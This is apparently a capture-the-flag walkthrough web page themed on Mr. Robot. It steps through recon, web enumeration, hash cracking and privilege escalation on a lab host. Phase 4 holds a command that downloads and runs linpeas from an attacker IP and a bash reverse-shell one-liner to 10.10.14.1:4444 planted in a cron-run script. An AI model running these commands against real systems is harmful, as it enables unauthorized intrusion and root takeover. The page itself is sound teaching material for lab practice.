MR.ROBOT — CTF: Detailed Walkthrough

Challenge: "mr.robot-ctf-01" • Read: ~20 minutes

Table of Contents

Click an item to jump to that section

  1. Recon / Khoj
  2. Enumeration / Jaankari
  3. Exploit / Prayog
  4. PrivEsc / Uttaran
  5. Flag / Jhanda
  6. Post Notes

Phase 1 — Recon (Surface & Passive)

EN: Passive collection first — domain history, subdomains, certificates, and public footprints. Record every header, token hint, or developer comment.

terminal@recon:~#
.--. .--. .--. .--. .--. FSOCIETY | |---| |---| |---| |---| | ' ' ' ' ' ' ' ' ' '
# passive: cert + subdomain crt.sh --domain example.com subfinder -d example.com -silent > subdomains.txt
Run only in lab or where you have permission. Replace example.com.

Look at certificate common names, expiration history, and any anomalies (developer emails, alternate names).

terminal@recon:~#
# active: nmap ping & top ports nmap -Pn -sC -sV -p- --min-rate 1000 -oA scans/initial 10.10.10.42
Record open ports and services. Note headers like X-ctf or odd cookies.

Phase 2 — Enumeration (Web & App)

EN: Web enumeration — directory fuzzing, JS analysis, API auditing, and collection of endpoints. Look for hidden uploaders, backup files, or dev endpoints.

terminal@enum:~#
# dir brute gobuster dir -u http://10.10.10.42 -w /usr/share/wordlists/dirb/common.txt -t 50 -o scans/gobuster.txt
Results: /admin, /uploads, /backup.zip (if present: note size & header)

Download and inspect JS files. Search for tokens, API endpoints, or base64 blobs. Static analysis often reveals logic flaws.

terminal@enum:~#
# fetch js & search wget http://10.10.10.42/static/app.js -O app.js grep -n "api" app.js || strings app.js | less
If you find /api/notes or /api/backup — test parameter handling carefully in lab.

Phase 3 — Exploit (Lab-Only Steps)

EN: Use controlled POSTs and parameter fuzzing. If you discover a token mechanism, replay tokens safely in your isolated VM. The aim is initial shell or credential leak.

terminal@exploit:~#
# safe probe: post JSON (lab) curl -s -X POST http://10.10.10.42/api/notes -H "Content-Type: application/json" \ -d '{"title":"test","body":"probe","token":""}' | jq .
If response prints a backup link or hash — note it. Avoid brute-force on real services.

If you recover a hash: use offline cracking in your lab (john / hashcat) with known wordlists. Respect legal boundaries.

terminal@exploit:~#
# offline crack (lab) john --wordlist=/usr/share/wordlists/rockyou.txt recovered_hash.txt
Result may yield credentials like fsociety123 (example).

Phase 4 — Privilege Escalation (Local Enumeration)

EN: On the host, enumerate SUID, cronjobs, sensitive files, and common misconfigurations. Tools: linpeas, sudo -l, find with SUID filters.

user@victim:~$
# local enum (lab) wget http://10.10.14.1/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
linPEAS highlights weak perms, writable scripts, or cron jobs running as root.

Example finding: /opt/backup.sh executed by root cron but world-writable. That’s an escalation vector in many CTFs.

user@victim:~$
# example: leverage writable backup script (lab) echo "/bin/bash -i >& /dev/tcp/10.10.14.1/4444 0>&1" > /tmp/myscript.sh # then wait for cron or trigger per lab instructions
Use only in CTF labs. This demonstrates the pattern of replacing writable scripts.

Phase 5 — Flag (Reveal)

Final step: retrieve root flag (e.g., /root/root.txt) after successful privilege escalation.

Warning: This page contains the canonical lab flag. For competitions, do not reveal flags publicly.

Post Exploit Notes & Lessons

  • Document everything: headers, cookies, tokens, file sizes, and timestamps.
  • Always test exploits in isolated lab VMs only.
  • Privilege escalation commonly arises from writable scripts, misconfigured sudo, exposed credentials, or outdated services.
  • When writing a public writeup, avoid posting spoilers or exact exploit scripts used in live environments.

Want an export (PDF/ZIP with sample logs)? Use the print function for PDF, or ask and I'll prepare a downloadable ZIP of lab artifacts.

© MR.ROBOT CTF — Educational Walkthrough • Lab-only instructions